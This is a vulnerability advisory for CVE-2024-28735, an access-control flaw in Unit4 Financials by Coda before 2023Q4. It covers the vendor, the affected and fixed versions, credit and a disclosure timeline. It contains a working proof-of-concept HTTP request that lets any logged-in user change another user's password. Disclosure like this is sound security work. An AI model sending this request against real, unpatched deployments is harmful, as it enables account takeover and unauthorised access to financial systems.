Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.
advisories | CVE-2024-28735
# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Léo DRAGHI
# CVE: CVE-2024-28735
# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.
POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>
{
"user" : "<targeted_user>",
"password" : "<attacker_user_password>",
"company" : "<company>",
"newPassword" : "<new_password_for_targeted_user",
"tzOffset" :240
}
# TIMELINE
– 30/10/2023: Vulnerability found
– 02/11/2023: Vendor informed
– 05/12/2023: Vendor fixed the issue
– 14/03/2024: Public disclosure